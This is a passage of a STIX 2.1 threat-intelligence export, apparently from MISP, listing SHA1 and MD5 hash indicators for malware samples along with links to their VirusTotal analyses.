"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8116-dbcc-4aad-a513-412702de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8116-dbcc-4aad-a513-412702de0b81",
|
|
"value": "https://www.virustotal.com/file/d9c2be7b02dcf65889d764ba4ebf9908672c2a234cb4291d89826ff749909623/analysis/1433266147/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8117-ad9c-4e1a-93c1-4b4d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:39.000Z",
|
|
"modified": "2017-03-29T09:40:39.000Z",
|
|
"description": "sample - Xchecked via VT: b7bf2ad207ac67e422bc69ec0058fb21a8f52061b564e1ef565887eaf3dd1dca",
|
|
"pattern": "[file:hashes.SHA1 = 'dab4ef98223c9a25110869208675bafb0ecb96ad']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:39Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8117-5aac-415e-947c-429702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:39.000Z",
|
|
"modified": "2017-03-29T09:40:39.000Z",
|
|
"description": "sample - Xchecked via VT: b7bf2ad207ac67e422bc69ec0058fb21a8f52061b564e1ef565887eaf3dd1dca",
|
|
"pattern": "[file:hashes.MD5 = '11e8da13680b91173cb1f5c67f01bfc4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:39Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8118-f3a0-4700-9e28-44a702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:40.000Z",
|
|
"modified": "2017-03-29T09:40:40.000Z",
|
|
"first_observed": "2017-03-29T09:40:40Z",
|
|
"last_observed": "2017-03-29T09:40:40Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8118-f3a0-4700-9e28-44a702de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8118-f3a0-4700-9e28-44a702de0b81",
|
|
"value": "https://www.virustotal.com/file/b7bf2ad207ac67e422bc69ec0058fb21a8f52061b564e1ef565887eaf3dd1dca/analysis/1448976073/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8119-d9e0-42b6-bd17-44e402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:41.000Z",
|
|
"modified": "2017-03-29T09:40:41.000Z",
|
|
"description": "sample - Xchecked via VT: 63f1f839dbac88b1ad4022e152379d3d909f30eaf34d08b3c459f16845082c94",
|
|
"pattern": "[file:hashes.SHA1 = 'a5b16854104a2d3359b340bc1795909d0286629d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db811a-9650-48af-9d5d-479002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:42.000Z",
|
|
"modified": "2017-03-29T09:40:42.000Z",
|
|
"description": "sample - Xchecked via VT: 63f1f839dbac88b1ad4022e152379d3d909f30eaf34d08b3c459f16845082c94",
|
|
"pattern": "[file:hashes.MD5 = '90a22c37ca35b5743ea4ccf789516b0a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:42Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db811b-be4c-4fb7-9a13-421e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:43.000Z",
|
|
"modified": "2017-03-29T09:40:43.000Z",
|
|
"first_observed": "2017-03-29T09:40:43Z",
|
|
"last_observed": "2017-03-29T09:40:43Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db811b-be4c-4fb7-9a13-421e02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db811b-be4c-4fb7-9a13-421e02de0b81",
|
|
"value": "https://www.virustotal.com/file/63f1f839dbac88b1ad4022e152379d3d909f30eaf34d08b3c459f16845082c94/analysis/1433076846/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db811c-66a0-4796-b042-4b4302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:44.000Z",
|
|
"modified": "2017-03-29T09:40:44.000Z",
|
|
"description": "sample - Xchecked via VT: 0299289e2146e4655a8ba43191243dafab24023dafa857eaf82ed3ef423013a8",
|
|
"pattern": "[file:hashes.SHA1 = '69aa1fa39d93bde4d46b3d8f0f2b077c70d82484']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:44Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db811d-5a78-44fe-b264-4c9002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:45.000Z",
|
|
"modified": "2017-03-29T09:40:45.000Z",
|
|
"description": "sample - Xchecked via VT: 0299289e2146e4655a8ba43191243dafab24023dafa857eaf82ed3ef423013a8",
|
|
"pattern": "[file:hashes.MD5 = '4349e4d9c445f0cb3d8ec40a04c3dd1e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:45Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db811e-2ce8-4aa9-9593-488002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:46.000Z",
|
|
"modified": "2017-03-29T09:40:46.000Z",
|
|
"first_observed": "2017-03-29T09:40:46Z",
|
|
"last_observed": "2017-03-29T09:40:46Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db811e-2ce8-4aa9-9593-488002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db811e-2ce8-4aa9-9593-488002de0b81",
|
|
"value": "https://www.virustotal.com/file/0299289e2146e4655a8ba43191243dafab24023dafa857eaf82ed3ef423013a8/analysis/1433666530/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db811f-90d8-4165-b542-472202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:47.000Z",
|
|
"modified": "2017-03-29T09:40:47.000Z",
|
|
"description": "sample - Xchecked via VT: cc60033583227cda159007add0b3274f5752195bdae47495ee49d299b0a39ff4",
|
|
"pattern": "[file:hashes.SHA1 = '797dabfcf95194055f69d56c6b5bde8107c1a12c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8120-0124-4077-925c-444b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:48.000Z",
|
|
"modified": "2017-03-29T09:40:48.000Z",
|
|
"description": "sample - Xchecked via VT: cc60033583227cda159007add0b3274f5752195bdae47495ee49d299b0a39ff4",
|
|
"pattern": "[file:hashes.MD5 = 'ae5d0a24c07857f1781d3da9f21c43e4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:48Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8121-e920-4896-ba48-44f002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:49.000Z",
|
|
"modified": "2017-03-29T09:40:49.000Z",
|
|
"first_observed": "2017-03-29T09:40:49Z",
|
|
"last_observed": "2017-03-29T09:40:49Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8121-e920-4896-ba48-44f002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8121-e920-4896-ba48-44f002de0b81",
|
|
"value": "https://www.virustotal.com/file/cc60033583227cda159007add0b3274f5752195bdae47495ee49d299b0a39ff4/analysis/1486420002/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8122-b2d8-4e50-9895-47b502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:50.000Z",
|
|
"modified": "2017-03-29T09:40:50.000Z",
|
|
"description": "sample - Xchecked via VT: f98ac9b51c9395ed3d28dbfae6116b2f753dfec679223c6a4f9dac948a0e95a8",
|
|
"pattern": "[file:hashes.SHA1 = 'b29cdf8f6c38eb18a920205793dfcaa1908742fc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:50Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8123-e618-4df3-9d16-4c3502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:51.000Z",
|
|
"modified": "2017-03-29T09:40:51.000Z",
|
|
"description": "sample - Xchecked via VT: f98ac9b51c9395ed3d28dbfae6116b2f753dfec679223c6a4f9dac948a0e95a8",
|
|
"pattern": "[file:hashes.MD5 = 'd906e3fde434821528a2a66e07893db2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:51Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8124-d050-4bb0-b4c3-4ef502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:52.000Z",
|
|
"modified": "2017-03-29T09:40:52.000Z",
|
|
"first_observed": "2017-03-29T09:40:52Z",
|
|
"last_observed": "2017-03-29T09:40:52Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8124-d050-4bb0-b4c3-4ef502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8124-d050-4bb0-b4c3-4ef502de0b81",
|
|
"value": "https://www.virustotal.com/file/f98ac9b51c9395ed3d28dbfae6116b2f753dfec679223c6a4f9dac948a0e95a8/analysis/1489573160/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8125-36b0-40de-ba56-4fd302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:53.000Z",
|
|
"modified": "2017-03-29T09:40:53.000Z",
|
|
"description": "sample - Xchecked via VT: 271431e7eb1c89b52ffb154912925dcf9fc4210fa91a2b4c27f27037f1bc9e02",
|
|
"pattern": "[file:hashes.SHA1 = 'bd80ab8fd9e095b7d3b3de360255703969b85862']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:53Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8126-57a0-49e6-95fd-425e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:54.000Z",
|
|
"modified": "2017-03-29T09:40:54.000Z",
|
|
"description": "sample - Xchecked via VT: 271431e7eb1c89b52ffb154912925dcf9fc4210fa91a2b4c27f27037f1bc9e02",
|
|
"pattern": "[file:hashes.MD5 = 'df8b59fd73921f71c2101bf3957ab068']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:54Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8127-9fac-45e0-8c2d-469602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:55.000Z",
|
|
"modified": "2017-03-29T09:40:55.000Z",
|
|
"first_observed": "2017-03-29T09:40:55Z",
|
|
"last_observed": "2017-03-29T09:40:55Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8127-9fac-45e0-8c2d-469602de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8127-9fac-45e0-8c2d-469602de0b81",
|
|
"value": "https://www.virustotal.com/file/271431e7eb1c89b52ffb154912925dcf9fc4210fa91a2b4c27f27037f1bc9e02/analysis/1486997340/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8128-f56c-465f-81de-46ba02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:56.000Z",
|
|
"modified": "2017-03-29T09:40:56.000Z",
|
|
"description": "sample - Xchecked via VT: 7e83122da3f7152a5a03deca48dd600315b1c8c285c9e5922e7d691d6afe0f4f",
|
|
"pattern": "[file:hashes.SHA1 = '3a6db67cb2294801dd6ba83cf268751a40097c80']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:56Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8129-4348-48c8-bb1c-4bc702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:57.000Z",
|
|
"modified": "2017-03-29T09:40:57.000Z",
|
|
"description": "sample - Xchecked via VT: 7e83122da3f7152a5a03deca48dd600315b1c8c285c9e5922e7d691d6afe0f4f",
|
|
"pattern": "[file:hashes.MD5 = 'ed071a78c52a4e344b7a69dfc4fddf0f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:57Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8129-37c4-489e-a9e2-487102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:57.000Z",
|
|
"modified": "2017-03-29T09:40:57.000Z",
|
|
"first_observed": "2017-03-29T09:40:57Z",
|
|
"last_observed": "2017-03-29T09:40:57Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8129-37c4-489e-a9e2-487102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8129-37c4-489e-a9e2-487102de0b81",
|
|
"value": "https://www.virustotal.com/file/7e83122da3f7152a5a03deca48dd600315b1c8c285c9e5922e7d691d6afe0f4f/analysis/1485674034/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db812a-5910-4e05-aec1-4bd502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:58.000Z",
|
|
"modified": "2017-03-29T09:40:58.000Z",
|
|
"description": "sample - Xchecked via VT: b30f53594e7e4b21a54c4011d67b2075185ca1b53084078b624341a8ab906702",
|
|
"pattern": "[file:hashes.SHA1 = 'edf2fda9ce2d9a181b3bee9e546fe9080406e172']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:58Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db812b-6588-440d-9069-49f502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:59.000Z",
|
|
"modified": "2017-03-29T09:40:59.000Z",
|
|
"description": "sample - Xchecked via VT: b30f53594e7e4b21a54c4011d67b2075185ca1b53084078b624341a8ab906702",
|
|
"pattern": "[file:hashes.MD5 = '3db698e044da6429b91ec7519a781b90']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:59Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db812c-45a4-424b-9ef5-480102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:00.000Z",
|
|
"modified": "2017-03-29T09:41:00.000Z",
|
|
"first_observed": "2017-03-29T09:41:00Z",
|
|
"last_observed": "2017-03-29T09:41:00Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db812c-45a4-424b-9ef5-480102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db812c-45a4-424b-9ef5-480102de0b81",
|
|
"value": "https://www.virustotal.com/file/b30f53594e7e4b21a54c4011d67b2075185ca1b53084078b624341a8ab906702/analysis/1489573297/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db812d-d9ac-4878-8fdb-484f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:01.000Z",
|
|
"modified": "2017-03-29T09:41:01.000Z",
|
|
"description": "sample - Xchecked via VT: b39ffb21bcba526d3ee503bcfdd18aee2a2bdec4b0798c6648fd3f25f3d78bb5",
|
|
"pattern": "[file:hashes.SHA1 = '522abdcedb3cef1a6718304e28550ef1a3076f66']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db812e-f6d4-4ec0-b1d6-4ef002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:02.000Z",
|
|
"modified": "2017-03-29T09:41:02.000Z",
|
|
"description": "sample - Xchecked via VT: b39ffb21bcba526d3ee503bcfdd18aee2a2bdec4b0798c6648fd3f25f3d78bb5",
|
|
"pattern": "[file:hashes.MD5 = 'f7f263ee168119685aae4a40c7a9388a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:02Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db812f-bbf4-4bb2-894b-429102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:03.000Z",
|
|
"modified": "2017-03-29T09:41:03.000Z",
|
|
"first_observed": "2017-03-29T09:41:03Z",
|
|
"last_observed": "2017-03-29T09:41:03Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db812f-bbf4-4bb2-894b-429102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db812f-bbf4-4bb2-894b-429102de0b81",
|
|
"value": "https://www.virustotal.com/file/b39ffb21bcba526d3ee503bcfdd18aee2a2bdec4b0798c6648fd3f25f3d78bb5/analysis/1441145627/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8130-1074-4b15-808c-469402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:04.000Z",
|
|
"modified": "2017-03-29T09:41:04.000Z",
|
|
"description": "sample - Xchecked via VT: 5e0612a0124b15e193f630346800aee5307477110a5d4f8df23fc41d1d451387",
|
|
"pattern": "[file:hashes.SHA1 = 'cd2476d736afa102c604b64bfc5690e93d4b04e3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:04Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8131-272c-4402-a44f-42f202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:05.000Z",
|
|
"modified": "2017-03-29T09:41:05.000Z",
|
|
"description": "sample - Xchecked via VT: 5e0612a0124b15e193f630346800aee5307477110a5d4f8df23fc41d1d451387",
|
|
"pattern": "[file:hashes.MD5 = 'ca4a1dacfc1d6f8fbde167984c80258c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:41:05Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8132-3eb0-403b-8162-4cc302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:41:06.000Z",
|
|
"modified": "2017-03-29T09:41:06.000Z",
|
|
"first_observed": "2017-03-29T09:41:06Z",
|
|
"last_observed": "2017-03-29T09:41:06Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
